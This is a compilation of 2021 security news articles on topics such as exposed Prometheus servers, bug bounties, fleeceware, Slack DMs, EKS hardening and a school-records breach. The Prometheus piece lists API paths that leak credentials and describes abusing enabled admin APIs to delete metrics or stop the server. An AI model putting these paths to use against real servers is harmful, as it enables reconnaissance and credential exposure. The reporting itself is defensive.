Security  2024  2023  2022  2021  2020


Experts Warn of Unprotected Prometheus Endpoints Exposing Sensitive Information
15.10.21 
Security  Thehackernews
Prometheus
A large-scale unauthenticated scraping of publicly available and non-secured endpoints from older versions of Prometheus event monitoring and alerting solution could be leveraged to inadvertently leak sensitive information, according to the latest research.

"Due to the fact that authentication and encryption support is relatively new, many organizations that use Prometheus haven't yet enabled these features and thus many Prometheus endpoints are completely exposed to the Internet (e.g. endpoints that run earlier versions), leaking metric and label dat," JFrog researchers Andrey Polkovnychenko and Shachar Menashe said in a report.

Prometheus is an open-source system monitoring and alerting toolkit used to collect and process metrics from different endpoints, alongside enabling easy observation of software metrics such as memory usage, network usage, and software-specific defined metrics, such as the number of failed logins to a web application. Support for Transport Layer Security (TLS) and basic authentication was introduced with version 2.24.0 released on January 6, 2021.

The findings come from a systematic sweep of publicly-exposed Prometheus endpoints, which were accessible on the Internet without requiring any authentication, with the metrics found exposing software versions and host names, which the researchers said could be weaponized by attackers to conduct reconnaissance of a target environment before exploiting a particular server or for post-exploitation techniques like lateral movement.

Prometheus
Some of the endpoints and the information disclosed are as follows -

/api/v1/status/config - Leakage of usernames and passwords provided in URL strings from the loaded YAML configuration file
/api/v1/targets - Leakage of metadata labels, including environment variables as well as user and machine names, added to target machine addresses
/api/v1/status/flags - Leakage of usernames when providing a full path to the YAML configuration file
Even more concerningly, an attacker can use the "/api/v1/status/flags" endpoint to query the status of two administration interfaces — "web.enable-admin-api" and "web.enable-lifecycle" — and if found manually enabled, exploit them to delete all saved metrics and worse, shut down the monitoring server. It's worth noting the two endpoints are disabled by default for security reasons as of Prometheus 2.0.

Prometheus
JFrog said it found about 15% of the Internet-facing Prometheus endpoints had the API management setting enabled, and 4% had database management turned on. A total of around 27,000 hosts have been identified via a search on IoT search engine Shodan.

Besides recommending organizations to "query the endpoints […] to help verify if sensitive data may have been exposed," the researchers noted that "advanced users requiring stronger authentication or encryption than what's provided by Prometheus, can also set up a separate network entity to handle the security layer."


You Can Now Sign-in to Your Microsoft Accounts Without a Password
19.9.21 
Security   Thehackernews

Microsoft on Wednesday announced a new passwordless mechanism that allows users to access their accounts without a password by using Microsoft Authenticator, Windows Hello, a security key, or a verification code sent via SMS or email.

The change is expected to be rolled out in the coming weeks.

"Except for auto-generated passwords that are nearly impossible to remember, we largely create our own passwords," said Vasu Jakkal, Microsoft's corporate vice president for Security, Compliance, and Identity. "But, given the vulnerability of passwords, requirements for them have gotten increasingly complex in recent years, including multiple symbols, numbers, case sensitivity, and disallowing previous passwords."

"Passwords are incredibly inconvenient to create, remember, and manage across all the accounts in our lives," Jakkal added.

Over the years, weak passwords have emerged as the entry point for a vast majority of attacks across enterprise and consumer accounts, so much so that Microsoft said there are about 579 password attacks every second, translating to a whopping 18 billion every year.

The situation has also been exacerbated by the need to create passwords that are not only secure but are also easy to remember, often resulting in users reusing the same password for multiple accounts or relying on easy-to-guess passwords, ultimately making them vulnerable to brute-force password spraying attacks.

Jakkal notes that 15% of people use their pets' names for password inspiration, not to mention utilize family names and important dates like birthdays, with others banking on a formula for their passwords — "like Fall2021, which eventually becomes Winter2021 or Spring2022.

By dropping passwords out of the equation, the idea is to make it difficult for malicious actors to gain access to an account by leveraging a combination of factors such as your phone (something you have) and biometrics (something you are) for identification.

Customers can use the new feature to sign in to Microsoft services such as Microsoft 365, Teams, Outlook, OneDrive, and Family Safety, but after linking their personal accounts to an authenticator app like Microsoft Authenticator, and turning on the "Passwordless Account" setting under Advanced Security Options > Additional Security Options.


Fighting the Rogue Toaster Army: Why Secure Coding in Embedded Systems is Our Defensive Edge
10.9.21 
Security  Thehackernews

There are plenty of pop culture references to rogue AI and robots, and appliances turning on their human masters. It is the stuff of science fiction, fun, and fantasy, but with IoT and connected devices becoming more prevalent in our homes, we need more discussion around cybersecurity and safety.

Software is all around us, and it's very easy to forget just how much we're relying on lines of code to do all those clever things that provide us so much innovation and convenience.

Much like web-based software, APIs, and mobile devices, vulnerable code in embedded systems can be exploited if it is uncovered by an attacker.

While it's unlikely that an army of toasters is coming to enslave the human race (although, the Tesla bot is a bit concerning) as the result of a cyberattack, malicious cyber events are still possible. Some of our cars, planes, and medical devices also rely on intricate embedded systems code to perform key tasks, and the prospect of these objects being compromised is potentially life-threatening.

Much like every other type of software out there, developers are among the first to get their hands on the code, right at the beginning of the creation phase. And much like every other type of software, this can be the breeding ground for insidious, common vulnerabilities that could go undetected before the product goes live.

Developers are not security experts, nor should any company expect them to play that role, but they can be equipped with a far stronger arsenal to tackle the kind of threats that are relevant to them. Embedded systems - typically written in C and C++ - will be in more frequent use as our tech needs continue to grow and change, and specialized security training for the developers on the tools in this environment is an essential defensive strategy against cyberattacks.

Exploding air fryers, wayward vehicles… are we in real danger?
While there are some standards and regulations around secure development best practices to keep us safe, we need to make far more precise, meaningful strides towards all types of software security. It might seem far-fetched to think of a problem that can be caused by someone hacking into an air fryer, but it has happened in the form of a remote code execution attack (allowing the threat actor to raise the temperature to dangerous levels), as has vulnerabilities leading to vehicle takeovers.

Vehicles are especially complex, with multiple embedded systems onboard, each taking care of micro functions; everything from automatic wipers, to engine and braking capabilities. Intertwined with an ever-increasing stack of communication technologies like WI-Fi, Bluetooth, and GPS, the connected vehicle represents a complex digital infrastructure that is exposed to multiple attack vectors. And with 76.3 million connected vehicles expected to hit roads globally by 2023, that represents a monolith of defensive foundations to lay for true safety.

MISRA is a key organization that is in the good fight against embedded systems threats, having developed guidelines to facilitate code safety, security, portability and reliability in the context of embedded systems. These guidelines are a north star in the standards that every company must strive for in their embedded systems projects.

However, to create and execute code that adheres to this gold standard takes embedded systems engineers who are confident - not to mention security-aware - on the tools.

Why is embedded systems security upskilling so specific?
The C and C++ programming languages are geriatric by today's standards, yet remain widely used. They form the functioning core of the embedded systems codebase, and Embedded C/C++ enjoys a shiny, modern life as part of the connected device world.

Despite these languages having rather ancient roots - and displaying similar vulnerability behaviors in terms of common problems like injection flaws and buffer overflow - for developers to truly have success at mitigating security bugs in embedded systems, they must get hands-on with code that mimics the environments they work in. Generic C training in general security practices simply won't be as potent and memorable as if extra time and care is spent working in an Embedded C context.

With anywhere from a dozen to over one hundred embedded systems in a modern vehicle, it's imperative that developers are given precision training on what to look for, and how to fix it, right in the IDE.

Protecting embedded systems from the start is everyone's responsibility
The status quo in many organizations is that speed of development trumps security, at least when it comes to developer responsibility. They're rarely assessed on their ability to produce secure code, but rapid development of awesome features is the marker of success. The demand for software is only going to increase, but this is a culture that has set us up for a losing battle against vulnerabilities, and the subsequent cyberattacks they allow.

If developers are not trained, that's not their fault, and it's a hole that someone in the AppSec team needs to help fill by recommending the right accessible (not to mention assessable) programs of upskilling for their entire development community. Right at the beginning of a software development project, security needs to be a top consideration, with everyone - especially developers - given what they need to play their part.

Getting hands-on with embedded systems security problems
Buffer overflow, injection flaws, and business logic bugs are all common pitfalls in embedded systems development. When buried deep in a labyrinth of microcontrollers in a single vehicle or device, it can spell disaster from a security perspective.

Buffer overflow is especially prevalent, and if you want to take a deep dive into how it helped compromise that air fryer we talked about before (allowing remote code execution), check out this report on CVE-2020-28592.

Now, it's time to get hands-on with a buffer overflow vulnerability, in real embedded C/C++ code. Play this challenge to see if you can locate, identify, and fix the poor coding patterns that lead to this insidious bug:


Researchers Propose Machine Learning-based Bluetooth Authentication Scheme
3.9.21 
Security  Thehackernews

A group of academics has proposed a machine learning approach that uses authentic interactions between devices in Bluetooth networks as a foundation to handle device-to-device authentication reliably.

Called "Verification of Interaction Authenticity" (aka VIA), the recurring authentication scheme aims to solve the problem of passive, continuous authentication and automatic deauthentication once two devices are paired with one another, which remain authenticated until an explicit deauthentication action is taken, or the authenticated session expires.

"Consider devices that pair via Bluetooth, which commonly follow the pattern of pair once, trust indefinitely. After two devices connect, those devices are bonded until a user explicitly removes the bond. This bond is likely to remain intact as long as the devices exist, or until they transfer ownership," Travis Peters, one of the co-authors of the study, said.

"The increased adoption of (Bluetooth-enabled) IoT devices and reports of the inadequacy of their security makes indefinite trust of devices problematic. The reality of ubiquitous connectivity and frequent mobility gives rise to a myriad of opportunities for devices to be compromised," Peters added.

Authentication is a process to verify that an individual or a system is, in fact, who or what it claims to be. While authentication can also be achieved by identification — something who you are — the latest research approaches it from a verification perspective in that it aims to validate that apps and devices interact in a manner that's consistent with their prior observations. In other words, the device's interaction patterns act as a barometer of its overall behavior.

To this end, the recurring validation of interaction patterns allows for authenticating the device by cross-checking the device's behavior against a previously learned machine learning model that represents typical, trustworthy interactions, with the first authentication factor being the use of traditional Bluetooth identifiers and credentials.

"For example, a user that has a blood-pressure device may really only care if a blood-pressure monitor device is 'hooked up' to the measurement app, and is operating in a way that is consistent with how a blood-pressure monitor should operate," the researchers outlined.

"Presumably, so long as these properties hold, there is no immediate or obvious threat. If, however, a device connects as a blood-pressure monitor and then goes on to interact in a way that is inconsistent with typical interactions for this type of device, then there may be cause for concern."

VIA works by extracting features from packet headers and payloads and comparing them to a verification model to corroborate whether the ongoing interactions are consistent with this known authentic behavioral model, and if so, permit the devices to continue communicating with each other. As a consequence, any deviation from authentic interactions will result in failed verification, allowing devices to take steps to mitigate any future threat.

The model is constructed using a combination of features, such as n-grams built from deep packet inspection, protocol identifiers and packet types, packet lengths, and packet directionality. The dataset consists of a collection of 300 Bluetooth HCI network traces that capture interactions between 20 distinct smart health and smart home devices and 13 different smartphone apps installed on a Nexus 5 smartphone running Android 6.0.1.

"We see VIA's recurring verification of interaction patterns as a sort of second factor for authenticating the device," the researchers said. "As a result of this scheme, we introduce the notion of recurring behavioral authentication for Bluetooth connections, which can be integrated into a Bluetooth gateway device, such as a smartphone."


Microsoft Offers Up To $30K For Teams Bugs

26.3.2021 Security  Threatpost

A bug-bounty program launched for the Teams desktop videoconferencing and collaboration application has big payouts for finding security holes.

Microsoft wants to send the message the company is serious about the security of its popular Teams desktop application and it’s willing to put some cash behind the talk. A new bug-bounty program offers up to $30,000 for security vulnerabilities, with top payouts going to those with the most potential to expose Teams user data.

“The Teams desktop client is the first in-scope application under the new Apps Bounty Program, we look forward to sharing updates as we bring additional apps into this bounty program scope,” the program manager Lynn Miyashita said in her statement about the launch.

Researchers can claim five scenario-based awards under the new Apps Bounty Program, ranging from $6,000 to $30,000, with the highest payouts available for “vulnerabilities that have the highest potential impact on customer privacy and security,” the company said.

General bounties are awarded between $500 and $15,000, with other incentives: Standout bug hunters can earn a spot on Microsoft’s “Researcher Recognition Program” and eligibility for the yearly MSRC Most Valuable Security Researcher list, Miyashita explained.

Security researchers with Teams online vulnerabilities to report will still submit those through the Online Services Program, the announcement added.

Bug-Bounty Programs Inspire Customer Confidence
Beyond offering a nice payday for security researchers, the move to dedicate a bug-bounty program gives Microsoft some brand support to customers, judging from a recent survey.

Conducted by the Ponemon Institute and commissioned by Intel, the poll found that three-quarters of IT pros in charge of purchasing tech prefer to buy from vendors who are proactive about security. Bug-bounty programs are increasingly part of that package.

“Security doesn’t just happen,” Suzy Greenberg, vice president, Intel Product Assurance and Security, said about the Poneman Institute survey findings. “If you are not finding vulnerabilities, then you are not looking hard enough.”

Certainly, the cloud-collaboration market has seen plenty of security bugs and breaches in recent months, particularly following lockdowns, when these services became vital to everyday business.

Collaboration App Security Storm
Teams has been used in phishing lure scams, and last fall attackers used fake Teams updates to target users with malware.

Rival cloud-collab service Zoom has also had its share of embarrassing security fails, including a vanity URL zero-day flaw discovered last July, re-occurring Zoom bombings, impersonation attacks and this month’s Zoom screen-sharing glitch, which “briefly” leaked sensitive data.

The launch of Microsoft’s bug bounty program will both help root out these flaws before they become headlines and signal a renewed commitment to proactive security.

“Partnering with the security research community is an important part of Microsoft’s holistic approach to defending against security threats,” Microsoft’s Miyashita wrote.


Fleeceware Apps Bank $400M in Revenue

26.3.2021 Security  Threatpost
The cache of apps, found in Apple and Google’s official marketplaces is largely targeted towards children, including several “slime simulators.”

About 204 different “fleeceware” applications with a combined billion+ downloads have raked in more than $400 million in revenue so far, via the Apple App Store and Google Play, analysis has revealed.

Fleeceware apps generally offer users a free trial to “test” the app, before commencing automatic payments that can be exorbitant. In an analysis from Avast released on Wednesday, some of those subscriptions can reach $3,400 or more per year. And often, users are charged even after they’ve deleted the offending application.

“These applications generally have no unique functionality and are merely conduits for fleeceware scams,” said Avast researcher Jakub Vávra, in the posting. “While the applications generally fulfill their intended purpose, it is unlikely that a user would knowingly want to pay such a significant recurring fee for these applications, especially when there are cheaper or even free alternatives on the market.”

The company found that most of the offending apps (which were flagged to Apple and Google for review) are musical instrument apps, palm readers, image editors, camera filters, fortune tellers, QR code and PDF readers, and something called “slime simulators,” which allow users to play with virtual goo. Clearly, many of these apps are marketed towards children. Unfortunately, parents often only figure out the source of the charges weeks or months later, according to the research.

“It appears that part of the fleeceware strategy is to target younger audiences through playful themes and catchy advertisements on popular social networks with promises of ‘free installation’ or ‘free to download,'” Vávra said. “By the time parents notice the weekly payments, the fleeceware may have already extracted significant amounts of money.”

3-Day Free Trials
Most of the apps that Avast discovered are offering a free three-day trial, according to the research. After that, the models vary. Most of the apps charge between $4 to $12 per week, which equates to $208 to $624 per year; but others charge as much as $66 per week, totaling $3,432 per year.

Avast also found several applications that were previously free or only required a one-off fee to unlock features; now, they have converted to charging expensive weekly subscriptions, with or without users’ knowledge.

Vávra noted that most of the apps are spreading via normal advertising channels, such as Facebook, Instagram, Snapchat and TikTok.

“As these applications are not considered malware and are available on official app stores, they also have access to official advertisement channels to spread the fleeceware scheme,” he noted. “Due to this scheme’s lucrative nature, the actors are likely investing substantial amounts of money to further propagate these apps via popular platforms.”

Once the user clicks on an ad (which usually features a video of the app that doesn’t match its actual features), the person is redirected to the app’s profile, usually featuring a four or five-star review average.

“The app profile looks official and doesn’t raise red flags at first sight,” the researcher said. “However, upon closer investigation, it becomes apparent that a big portion of the reviews are fake (they contain repeating text or are poorly-worded and generic in nature). There is reason to believe this form of review boosting is becoming a more prominent practice.”

Uninstalling Doesn’t Help
The worst part might be the quasi-permanent state of the “infection.” Vávra pointed out that both Google and Apple state that they aren’t responsible for subscription refunds after a certain time period, leaving victims with the app developers themselves as their main recourse.

“As evidenced by reviews, the developers can simply choose to ignore the users or claim the user’s knowledge about the subscription fee and refuse to refund the victims,” he said. “Several developer profiles that our team discovered provided links to discontinued websites or contact forms. All in all, it appears there is very little that victims can do in these scenarios other than contacting their bank and requesting a chargeback.”

The good news is that Google surfaces a notification prompt that warns users of active subscriptions for uninstalled apps; and Apple asks users whether they want to keep subscriptions when a user uninstalls an app. But there’s much more to be done, according to Vávra. For instance, apps could be required to ask for another confirmation before paying money for the actual subscription once the free trial is over. And, Apple and Google could remove and filter out fake and automated reviews.

Persistent App Scourge
For now, it’s likely this scourge will stick around. In January, Sophos research uncovered that these type of apps have been installed nearly 600 million times on 100 million plus devices, just from Google Play alone.

“The data is startling: With nearly a billion downloads and hundreds of millions of dollars in revenue, this model is attracting more developers and there is evidence to suggest several popular existing apps have updated to include the free trial subscription with high recurring fees,” Vávra said. “Unfortunately, this endeavour can be lucrative even if a small percentage of users fall victim to fleeceware.”


New Slack Connect DM Feature Raises Security Concerns
26.3.2021
Security  Securityweek

Business communications platform Slack rushed to take action on Wednesday after customers raised security-related concerns regarding a new feature that allows users to send direct messages to any other Slack user.

The new direct message feature, officially launched on Wednesday, is part of the Slack Connect service, which is advertised by the company as an efficient way for organizations to communicate with partners, vendors and customers — basically an alternative for email. The new DM feature enables paying customers to “quickly and securely connect with anyone outside of [their] organisation” based on their email address.

“Simply send an invite to any partner, and start messaging in Slack as soon as the other side accepts, speeding up the work that often starts over back-and-forth emails. A salesperson can form a direct line of contact to prospects, or a customer service agent can triage an issue faster, without waiting for the other side to check their email,” Slack wrote in a blog post announcing the new feature.

Slack says more than 750,000 companies use its services, but the new DM feature is currently only available to roughly 74,000 paying customers. Slack does plan on expanding the DM feature to all customers, including those on free subscriptions, in the future. The feature is enabled by default, but administrators can opt out, Slack says in its documentation.

The problem raised by many after the feature was announced was related to the customizable text that users could include in a Connect DM invite sent out to someone.

Some users pointed out how easily the feature could be abused to harass others. The text a user could add to an invitation was sent via email from a generic Slack email address. Blocking this Slack email address to stop receiving abusive messages would also mean blocking other, potentially important Slack messages.

Slack Connect DM abuse harassment

Hours later, Slack announced that — based on user feedback — it removed the ability to send custom messages when sending out invitations for Connect DMs.

“Slack Connect’s security features and robust administrative controls are a core part of its value both for individual users and their organizations. We made a mistake in this initial roll-out that is inconsistent with our goals for the product and the typical experience of Slack Connect usage. As always, we are grateful to everyone who spoke up, and we are committed to fixing this issue,” Slack said.

Dirk Schrader, global VP of security research at New Net Technologies (NNT), a Florida-based provider of cybersecurity and compliance software, told SecurityWeek, “Product management is always about user experience, about features that help and support users in what they do with the product. This one falls into the ‘it's compiled, roll it out’ category of not thinking twice about how a feature is potentially used by someone with malicious intent. This gaffe by Slack has been quickly identified and stopped, but puts some shadow on its roadmap process and the way features are selected and verified from all kinds of security aspects a user can be concerned of, including bullying.”

Some security experts also raised concerns about how the DM feature could be abused for phishing. And once the targeted user has accepted an invitation to connect, a bad actor could abuse file upload features to deliver malware.

While the DM feature can be useful, it could cause a lot of headaches for administrators and security teams.

“For many employees, Slack is seen as a trusted communication zone. This [feature] changes that for orgs,” said Rachel Tobac, CEO of SocialProof Security, a company that provides social engineering and hacking training. “If those outside the trusted space have access, it’s now an attack option. As a pentester I used to use more spoofable comms like email, SMS, & phone to attack & now I’ll try Slack too.”

“This is a lot of work on Slack admins to manage which DMs/channels are allowed or available. For instance, I’m added to an org’s internal slack for 1 project — still have limited access but I can add others & the admin has to approve. This will increase admin fatigue & mistakes,” she added.

“I’ll be watching this new Slack feature closely to see how cyber criminals use it to send malware to folks within orgs, and how it’s leveraged in phishing,” Tobac said.

Oliver Tavakoli, CTO at Vectra, a San Jose, Calif.-based provider of technology which applies AI to detect and hunt for cyber attackers, also commented on the topic.

“When a collaboration platform adds features which extend beyond a single organization’s boundary, a complex set of issues inevitably arise. Email has historically been the primary channel for such interactions and we have spent the last couple of decades adding checks for inappropriate content, phishing, malware, etc. to that channel. Slack’s decision to enable such a channel without any of those controls in place appears to have totally ignored this historical context,” Tavakoli told SecurityWeek.


Microsoft Offers Up to $30,000 for Vulnerabilities in Teams Desktop Client
26.3.2021
Security  Securityweek

Microsoft on Wednesday announced that its bug bounty programs now also cover the desktop client of its Teams business communications platform.

The tech giant is offering rewards for vulnerabilities in the Teams desktop client as part of its Application Bounty Program, which will feature additional app-related bounties in the future.

The Teams desktop client bug bounty program complements the existing awards for vulnerabilities in online Teams services.

Microsoft says researchers can earn between $500 and $15,000 for general vulnerabilities in the Teams desktop client, and between $6,000 and $30,000 if they demonstrate an exploit that fits one of five scenarios.

For example, white hat hackers can earn up to $30,000 for remote code execution with no user interaction, and $15,000 for the ability to obtain authentication credentials for other users without leveraging phishing attacks.

Payouts for vulnerabilities in Microsoft Teams desktop client

Microsoft reported in August 2020 that it had paid out nearly $14 million through its bug bounty programs in the past year. The single biggest reward was $200,000.


Why Focusing on Container Runtimes Is the Most Critical Piece of Security for EKS Workloads?
20.3.2021
Security  Securityaffairs

Amazon Elastic Kubernetes Service (EKS), a platform which gives customers the ability to run Kubernetes apps in the AWS cloud or on premises.
Organizations are increasingly turning to Kubernetes to manage their containers. In the 2020 Cloud Native Survey, 91% of respondents told the Cloud Native Computing Foundation (CNCF) that they were using Kubernetes—an increase from 78% in 2019 and 58% a year earlier. More than four-fifths (83%) of that year’s survey participants said that they were running Kubernetes in their production environment.

These findings reflect the fact that organizations are turning to Kubernetes in order to minimize application downtime. According to its documentation, Kubernetes comes with load balancing features that help to distribute high network traffic and keep the deployment stable. It also enables admins to describe the desired state of their containers and use that specification to change the actual state of those containers to the desired state. If any of the containers don’t respond to a user-defined health check in the meantime, Kubernetes can use its self-healing properties to kill those containers and replace them with new ones.

Amazon EKS and the Need for Security

Some organizations are setting up their own environments to take advantage of Kubernetes’ benefits, while others are turning to vendor-managed platforms. Regarding the latter, one of the most popular of those options is Amazon Elastic Kubernetes Service (EKS), a platform which gives customers the ability to run Kubernetes apps in the AWS cloud or on premises. Amazon EKS comes with many benefits including the ability to automatically detect and replace unhealthy control plane nodes as well as scale their resources efficiently. It also applies the newest security patches to a cluster’s control plane as a means of giving customers a more secure Kubernetes environment.

With that last point in mind, perhaps the most important element of EKS security is the need to limit the permissions and capabilities of container runtimes. Container runtimes are dynamic in nature; they’re constantly spinning up and winding down. This dynamism makes it difficult for admins to maintain visibility of their containers, notes Help Net Security, a fact which malicious actors commonly exploit to conduct scans, perform attacks and launch data exfiltration attempts. As such, admins need to vet all of their activities within the container application environment to ensure that their organizations aren’t under attack.

Best Practices for Container Runtime Security in EKS
Admins can follow some best practices to ensure container runtime security in EKS. Those recommendations include the following:

Be Strategic with Namespaces

Admins need to be careful with their namespaces, names which help them to divide cluster resources between multiple users. Specifically, they should use their namespaces liberally and in a way that supports their applications. This latter point involves privilege segregation, a process which ensures all workloads that are managed by different teams have their own namespace.

Implement Role-Based Access Control
As noted elsewhere in Kubernetes’ documentation, Role-Based Access Control (RBAC) is a means by which admins can regulate access to computer or network resources based on individual users’ roles. RBAC API does this by declaring four objects:

Role: This API object is a set of permissions that’s given within a specific namespace.
ClusterRole: Like a role, a ClusterRole contains rules that represent a set of permissions. But this API object is a non-namespaced resource that enables admins to define permissions across all namespaces and on cluster-scoped resources.
RoleBinding: This API object takes the permissions defined by a Role and assigns it to a user or a group of users within a namespace.
ClusterRoleBinding: Using the permissions contained within a ClusterRole, a ClusterRoleBinding assigns those rights across all namespaces in the cluster.
To secure the container runtime environment, admins should consider following the principle of least privilege when working with these four API objects. In particular, they might consider limiting their use of ClusterRoles and ClusterRoleBindings, as these assignments could enable an attacker to move to other cluster resources if they compromise a single user account.

Use Network Policies for Cluster Traffic Control

Pods are non-isolated by default, as noted on Kubernetes’ website. These groups of containers accept traffic from any source. Knowing that, a malicious actor could compromise a single pod and leverage that event to move laterally to other pods and cluster resources.

Admins can defend against this type of event by creating a Network Policy that selects their pods and rejects any connections that are not specified within their terms. Admins can begin by creating a Network Policy with egress and ingress policies that support their organization’s security requirements. They can then select whichever pods they want to protect using those specified network connection rules.

Enforce Security Contexts Using OPA Gatekeeper
Kubernetes enables admins to define privilege and access control settings for a pod or container using what’s known as security contexts. They can then enforce those security contexts within their Kubernetes environment using Gatekeeper. Created by the Open Policy Agent (OPA), this tool allows admins to do the same types of things that they’d want to do with the soon-to-be-deprecated Pod Security Policies (PSPs). However, Gatekeeper lets admins go a step further through the creation of custom policies that designate allowed container registries, impose pod resource limits and interact with almost any other parameter that admins can think of.

Protect IAM Credentials of the Nodes’ IAM Instance Role

Here’s StackRox with some guidance on how to implement this security measure:

The nodes are standard EC2 instances that will have an IAM role and a standard set of EKS permissions, in addition to permissions you may have added. The workload pods should not be allowed to grab the IAM’s credentials from the EC2 metadata point. You have several options for protecting the endpoint that still enable automated access to AWS APIs for deployments that need it. If you don’t use kube2iam or kiam, which both work by intercepting calls to the metadata endpoint and issuing limited credentials back to the pod based on your configuration, install the Calico CNI so you can add a Network Policy to block access to the metadata IP, 169.254.169.254.

EKS Security on a Broader Scale
The guidance provided above can help admins ensure container runtime security in Amazon EKS. For more information about other aspects of Amazon EKS security, click here


Mom & Daughter Duo Hack Homecoming Crown
17.3.2021
Security  Threatpost

A Florida high-school student faces jail time for rigging her school’s Homecoming Queen election.

A 17-year-old high school senior along with her mother, Laura Rose Carroll, were arrested this week, charged with accessing student records in a fraudulent attempt to rig her school’s Homecoming Queen election.

Carroll worked as an assistant principal at Bellview Elementary School in the Escambia County School District in Cantonment, Fla. — the same district where her daughter attended Tate High School, the Washington Post reported. Authorities were tipped off to the fake votes after the daughter bragged to other students about using her mom’s access to “FOCUS,” the district student-information system, to cast votes in the election for the school’s Homecoming Court from student accounts, without their knowledge.

Tate High School’s student body of about 2,000 had two days between Oct. 28 and 30 to cast their votes for Homecoming Court through “Election Runner,” a system frequently used by the school for election-type activities. It requires students to provide their school-ID numbers and birth dates before they can vote.

On Oct. 31, Carroll’s daughter was crowned Homecoming Queen, but the victory was short-lived. The Washington Post said that before the vote window was closed, Election Runner sent an alert to the school warning that many of the votes were suspected to be fraudulent.

‘FOCUS’ Student-Data System Breached
Carroll’s daughter didn’t seem too worried about hiding the fraud, since she bragged to fellow students about the stolen votes. Arrest records document about 117 votes from the same IP address, which investigators were able to trace back to Carroll’s home and cellphone, the Post reported.

“She looks up all of our group of friends’ grades and makes comments about how she can find our test scores all the time,” one student said, in a written statement.

“I recall times that she logged onto her mom’s FOCUS account and openly shared information, grades, schedules, etc., with others,” another student’s statement read. “She did not seem like logging in was a big deal, and was very comfortable with doing so.”

Another witness told authorities that Carroll would have received a notification each time her daughter logged onto the FOCUS system, according to the Post. The witness added that Carroll was required to change her password for the FOCUS system every 45 days, meaning she would have had to have shared each of the new passwords with her daughter for her to maintain access.

Carroll met with the Escambia County School board on Nov. 4 about the alleged abuse of the school’s student data. On Nov. 5, the district contacted the Florida Department of Law Enforcement [FDLE] to report she and her daughter “were involved in potential unauthorized access to student FOCUS accounts,” the Post added.

“The investigation also found that beginning August 2019, Carroll’s FOCUS account accessed 372 high school records, and 339 of those were of Tate High School students,” FDLE said in a news release. “The investigation also revealed that beginning August 2019, Carroll’s Focus account accessed 372 high school records, and 339 of those were of Tate High School students.”

Both Carroll and her daughter were arrested on one count each of offenses against users of computers, computer systems, computer networks and electronic devices (a third-degree felony); unlawful use of a two-way communications device (also a third-degree felony); criminal use of personally identifiable information (yet another third-degree felony); and conspiracy to commit these offenses (a first-degree misdemeanor), according to the FDLE.

School-District Insider Threats
With schools under constant threat of cyberattack, targeted by malware, phishing, distributed denial of service (DDoS), Zoom-bombings and more, abuse from trusted users and insider threats is also something that needs to be checked. A joint alert issued from CISA and the FBI last December called schools a “data-rich environment of student information.”

And in case there was any question about how seriously law enforcement tends to take this type of breach of student data, just look at the consequences Carroll and her daughter are facing.

Carroll was arrested and booked into the county jail and released after posting $6,000 bond, according to the Post, while her daughter was taken to the juvenile detention center. Carroll was also suspended from her job, the Post said.


OVH data centers suffered a fire, many popular sites are offline
11.3.2021
Security  Securityaffairs

OVH, the largest hosting provider in Europe, has suffered a terrible fire that destroyed the data centers located in Strasbourg.
OVH, one of the largest hosting providers in the world, has suffered a terrible fire that destroyed its data centers located in Strasbourg.

The news was also confirmed by OVH founder Octave Klaba via Twitter, he also provided a series of updates on the incident.

The French plant in Strasbourg includes 4 data centers, SBG1, SBG2, SBG3, and SBG4 that were shut down due to the incident, and the fire started in SBG2 one. Firefighters immediately acted to contain the fire, but the situation at the SBG2 rapidly went out of control. The authorities isolated the entire plant and closed off its perimeter.

The company is urging its customers to implement their disaster recovery plans because the fire has disrupted its services.

“At 00:47 on Wednesday, March 10, 2021, a fire broke out in a room in one of our 4 datacenters in Strasbourg, SBG2. Please note that the site is not classified as a Seveso site.” reads the announcement published by the company on the status page. “From 5:30 am, the site has been unavailable to our teams for obvious security reasons, under the direction of the prefecture. The fire is now contained. We are relieved that no one was injured, neither among our teams nor among the firefighters and the services of the prefecture, whom we thank for their exemplary mobilization at our side.”

OVH fire
Image from Xavier Garreau @xgarreau
Fire is over and firefighters continue work to cool the buildings, while the company is assessing the damages.

OVH has 15 data centers in Europe, 27 worldwide, it is working to support our customers and mitigate the impact of the incident at the Strasbourg site.

The update provided by Klaba at 11.20 am GMT, all servers in SBG3 are okay, but still non-operational.

At 1 pm the company publicly shared a recovery plan for its operations that will last the next 2 weeks.


Google Will Use 'FLoC' for Ad Targeting Once 3rd-Party Cookies Are Dead
5.3.2021
Security  Thehackernews
Google FLoC and FLEDGE
Signaling a major shift to its ads-driven business model, Google on Wednesday unequivocally stated it would not build alternate identifiers or tools to track users across multiple websites once it begins phasing out third-party tracking cookies from its Chrome browser by early 2022.

"Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while still delivering results for advertisers and publishers," said David Temkin, Google's director of product management for ads privacy and trust.

"Advances in aggregation, anonymization, on-device processing and other privacy-preserving technologies offer a clear path to replacing individual identifiers."

The changes, which could potentially reshape the advertising landscape, are expected only to cover websites visited via Chrome and do not extend to mobile apps.

At the same time, Google acknowledged that other companies might find alternative ways to track individual users. "We realize this means other providers may offer a level of user identity for ad tracking across the web that we will not," Temkin said. "We don't believe these solutions will meet rising consumer expectations for privacy, nor will they stand up to rapidly evolving regulatory restrictions."

Over the years, third-party cookies have become the mainstay driving digital ad business, but mounting concerns about data privacy infringement have led major browser vendors such as Apple, Mozilla, Brave, and Microsoft to introduce countermeasures to pull the plug on invasive tracking technology, in turn forcing Google to respond with similar privacy-first solutions or risk losing customer trust.

FLoC and FLEDGE for Privacy-Preserving Ad Targeting
For its part, the search giant — in an attempt to balance its twin roles as a web browser developer and owner of the world's largest advertising platform — early last year announced plans to eliminate third-party cookies in Chrome in favor of a new framework called the "Privacy Sandbox," which aims to protect anonymity while still delivering targeted ads without resorting to more opaque techniques like fingerprinting.

To that effect, Google has proposed a continually evolving collection of bird-themed ad targeting and measurement methods aimed at supplanting third-party cookies, chief among them being Federated Learning of Cohorts (FLoC) and TURTLEDOVE, which it hopes will emerge the standards for serving ads on the web.

Leveraging a technique called on-device machine learning, FLoC essentially aims to classify online users into groups based on similar browsing behaviors, with each user's browser sharing what's called a "cohort ID" to websites and marketers, who can then target users with ads based on the groups they belong to.

In other words, the data gathered locally from the browser is never shared and never leaves the device. By using this interest-based advertising approach, the idea is to hide users "in the crowd," thereby keeping a person's browsing history private and offering protections from individualized tracking and profiling.

TURTLEDOVE (and its extension called "FLEDGE"), on the other hand, suggests a new method for advertisers and ad tech companies to target an ad to an audience they had previously built without revealing other information about a users' browsing habits or ad interests.

